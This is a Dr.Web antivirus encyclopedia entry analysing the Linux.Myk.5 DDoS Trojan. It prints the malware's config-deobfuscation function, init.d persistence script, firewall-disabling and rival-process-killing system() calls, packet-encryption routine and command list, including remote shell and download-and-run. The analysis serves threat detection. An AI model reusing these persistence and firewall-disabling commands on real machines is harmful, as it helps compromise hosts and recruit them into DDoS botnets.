FOR CUSTOMERS

Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Linux.Myk.5

Added to the Dr.Web virus database: 2015-03-27

Virus description added:

A Trojan created by Chinese virus makers to carry out DDoS attacks on Linux computers. The ability of this malware to disable firewalls makes this program a rather dangerous one. The Trojan’s configuration file is obfuscated. The deobfuscating algorithm looks as follows:

def decrypt(data):
    out = array('B')
    for i in range(len(data)):
        if ((data[i] > 0x20) and (data[i] != 0x7F)):
            if (i % 3 == 1):
                out.append(data[i]-1)
            else:
                out.append(data[i]+1)
    return out

The configuration file contains the following data:

  1. Command and control server’s address
  2. Command and control server’s port
  3. Installation name
  4. Installation path

Once the configuration file is decrypted, the Trojan checks whether its process is already running the system. If the process is found, the Trojan’s work is terminated. During the installation, the malware creates the file “/etc/init.d/%proc_name%”. The installation name is specified in the configuration file. The following data is entered into the file:

#!/bin/bash\n# chkconfig: 2345 77 37\n# description: Open%proc_name% server daemon\nsetsid 
%install_path% &\nexit\n

%proc_name% and %install_path% stand here for the parameters specified in the configuration file.

Next, the Trojan copies itself to the location specified in the configuration file and runs the installed copy. Then it deletes the original file.

Finally, the Trojan creates and runs the following service:

ln -s /etc/init.d/%proc_name% /etc/rc2.d/S77%proc_name%
ln -s /etc/init.d/%proc_name% /etc/rc3.d/S77%proc_name%
ln -s /etc/init.d/%proc_name% /etc/rc4.d/S77%proc_name%
ln -s /etc/init.d/%proc_name% /etc/rc5.d/S77%proc_name%
service %proc_name% start
/etc/init.d/%proc_name%

Once the Trojan starts running on the infected computer, it initiates a separate process that monitors the performance of its copy run from the directory where the Trojan should be installed. If the process cannot be found, the Trojan initiates it again.

Once in every 1,000 seconds, the malware executes the following actions aimed at disabling the firewall and terminating the processes of other DDoS Trojans.

system("chkconfig --level 0123456 iptables off > /dev/null");
system("chkconfig --level 0123456 ip6tables off > /dev/null");
system("systemctl stop iptables.service > /dev/null");
system("service iptables stop > /dev/null");
system("/etc/init.d/iptables stop > /dev/null");
system("reSuSEfirewall2 stop > /dev/null");
system("SuSEfirewall2 stop > /dev/null");
system("service ebtables stop > /dev/null");
system("/etc/init.d/ebtables stop > /dev/null");
system("ufw disable > /dev/null");
system("netstat -anp | grep \":6009\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 >
 /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":60003\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 >
 /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":8092\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 >
 /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":8991\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 >
 /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":10991\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 >
 /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":10992\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 >
 /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":10993\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 >
 /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":3040\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 >
 /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":37368\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 >
 /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":10771\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 >
 /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":34921\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 >
 /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":7600\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 >
 /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":199099\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 >
 /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":19009\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 >
 /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":1818\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 >
 /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":57707\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 >
 /dev/null ;free -m > /dev/null");
sleep(10);
system("rm -f /boot/IptabLes ; rm -f /boot/.IptabLes ; rm -f /boot/IptabLex ; 
rm -f /boot/.IptabLex ; rm -f /usr/IptabLes ; rm -f /usr/.IptabLes ; rm -f /usr/IptabLex ; 
rm -f /usr/.IptabLex");
system("netstat -anp | grep \"IptabLes\" |awk '{print $NF}' |cut -d \"/\" -f 1 | 
xargs kill -9 > /dev/null ;free -m > /dev/null");
system("netstat -anp | grep \"IptabLex\" |awk '{print $NF}' |cut -d \"/\" -f 1 | 
xargs kill -9 > /dev/null ;free -m > /dev/null");

Next, the Trojan initiates two processes. One of them sends the information about the CPU load to cybercriminals, the other one waits for incoming commands from the server. The first package sent by the Trojan to cybercriminals contains data about the infected computer.

#pragma pack(push,1)
struct st_online
{
  char gap[64]; //0x00
  _BYTE cpuinfo[128];  
  char meminfo[32];
  char osver[32];
  char version[32]; //"LZ32"
  _DWORD dword120; //0x00
  _DWORD bIsStopDDOS;
};
#pragma pack(pop)

All data transferred from the command and control server are not encrypted, while the outcoming packages are.

int __cdecl EnBuffer(_BYTE *data, int size, unsigned __int8 key)
{
  int result; // eax@3
  char v4; // [sp+13h] [bp-9h]@1
  int i; // [sp+14h] [bp-8h]@1
  v4 = key % 254 + 1;
  for ( i = 0; ; ++i )
  {
    result = i;
    if ( i >= size )
      break;
    data[i] ^= v4;
    data[i] += v4;
  }
  return result;
}

The malware can execute the following commands:

  • Start the DDoS attack (SYN Flood)
  • Start the DDoS attack (UDP Flood)
  • Start the DDoS attack (DNS Flood)
  • Start the DDoS attack (HTTP Flood)
  • Start the DDoS attack (TCP Flood)
  • Terminate the DDoS attack
  • Download and run the file
  • Remove itself from the system
  • Initiate the Trojan’s update
  • Run Remote Shell
  • Save the command’s data in the file “/.v8cf” or send the file contents to the server.

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number

Dr.Web © Doctor Web
2003 — 2022

Doctor Web is a Russian cybersecurity company focused on threat detection, prevention and response technologies.